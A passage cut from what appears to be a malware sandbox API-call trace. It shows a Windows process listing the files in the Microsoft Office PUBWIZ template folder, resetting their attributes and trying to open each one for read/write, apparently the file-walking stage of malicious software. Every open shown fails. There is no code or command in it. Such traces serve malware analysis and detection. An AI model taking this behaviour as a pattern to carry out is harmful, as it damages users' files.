flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.664] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BRCHUR98.POC", dwFileAttributes=0x80) returned 0 [0137.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BRCHUR98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\brchur98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.664] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.664] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.664] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.664] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.664] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BROCHURE.DPV", dwFileAttributes=0x80) returned 0 [0137.664] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BROCHURE.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\brochure.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.664] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.664] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.664] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.664] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BROCHURE.XML", dwFileAttributes=0x80) returned 0 [0137.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BROCHURE.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\brochure.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.665] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.665] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.665] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.665] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.665] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BS2BARB.POC", dwFileAttributes=0x80) returned 0 [0137.665] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BS2BARB.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bs2barb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.665] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.665] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.666] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.666] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.666] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BS4BOXES.POC", dwFileAttributes=0x80) returned 0 [0137.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BS4BOXES.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bs4boxes.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.666] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.666] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.666] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.666] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.666] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BS53BOXS.POC", dwFileAttributes=0x80) returned 0 [0137.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BS53BOXS.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bs53boxs.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.667] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.667] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.667] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.667] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.667] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BZCARD11.POC", dwFileAttributes=0x80) returned 0 [0137.667] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BZCARD11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bzcard11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.667] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.667] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.667] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.667] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.668] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BZCARDHM.POC", dwFileAttributes=0x80) returned 0 [0137.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BZCARDHM.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bzcardhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.668] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.668] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.668] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.668] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.668] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BZCD98SP.POC", dwFileAttributes=0x80) returned 0 [0137.668] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BZCD98SP.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bzcd98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.668] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.668] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.668] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.669] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.670] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BZCRD98.POC", dwFileAttributes=0x80) returned 0 [0137.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\BZCRD98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\bzcrd98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.670] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.670] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.670] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.670] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.670] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALENDAR.DPV", dwFileAttributes=0x80) returned 0 [0137.670] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALENDAR.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\calendar.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.670] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.670] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.671] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.671] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.671] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALENDAR.XML", dwFileAttributes=0x80) returned 0 [0137.671] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALENDAR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\calendar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.671] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.671] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.671] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.671] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.671] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALHM.POC", dwFileAttributes=0x80) returned 0 [0137.671] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALHM.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\calhm.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.672] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.672] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.672] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.672] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.672] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALNDR98.POC", dwFileAttributes=0x80) returned 0 [0137.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALNDR98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\calndr98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.673] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.673] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.673] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.673] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.673] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALSO11.POC", dwFileAttributes=0x80) returned 0 [0137.673] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALSO11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\calso11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.673] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.673] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.673] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.673] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALSO98.POC", dwFileAttributes=0x80) returned 0 [0137.674] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CALSO98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\calso98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.674] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.674] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.674] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.674] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.674] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATALOG.DPV", dwFileAttributes=0x80) returned 0 [0137.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATALOG.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\catalog.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.675] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.675] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.675] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.675] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.675] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATALOG.XML", dwFileAttributes=0x80) returned 0 [0137.675] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATALOG.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\catalog.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.675] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.675] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.675] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.676] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.676] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATWIZ.POC", dwFileAttributes=0x80) returned 0 [0137.676] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATWIZ.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\catwiz.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.676] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.676] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.677] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.677] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.677] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATWIZ11.POC", dwFileAttributes=0x80) returned 0 [0137.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CATWIZ11.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\catwiz11.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.677] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.677] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.677] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.677] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.677] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT.DPV", dwFileAttributes=0x80) returned 0 [0137.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\cert.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.677] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.678] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.678] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.678] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.678] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT.XML", dwFileAttributes=0x80) returned 0 [0137.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\cert.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.678] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.678] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.678] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.678] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.678] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT98.POC", dwFileAttributes=0x80) returned 0 [0137.678] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\cert98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.679] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.679] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.679] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.679] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.679] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT98SP.POC", dwFileAttributes=0x80) returned 0 [0137.679] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CERT98SP.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\cert98sp.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.679] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.679] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.679] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.679] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CHECKER.POC", dwFileAttributes=0x80) returned 0 [0137.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CHECKER.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\checker.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.680] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.680] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.680] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.680] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CONTACTINFOBB.DPV", dwFileAttributes=0x80) returned 0 [0137.680] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CONTACTINFOBB.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\contactinfobb.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.680] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.680] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.680] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.680] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CONTACTINFOBB.POC", dwFileAttributes=0x80) returned 0 [0137.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\CONTACTINFOBB.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\contactinfobb.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.681] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.681] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.681] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.681] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.681] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\COUPON.POC", dwFileAttributes=0x80) returned 0 [0137.681] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\COUPON.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\coupon.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.681] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.681] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.682] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.682] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.682] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBAR.DPV", dwFileAttributes=0x80) returned 0 [0137.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBAR.DPV" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgaccbar.dpv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.682] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.682] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.682] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.682] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.682] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBAR.XML", dwFileAttributes=0x80) returned 0 [0137.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\DGACCBAR.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\dgaccbar.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.682] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.683] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.683] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0137.683] 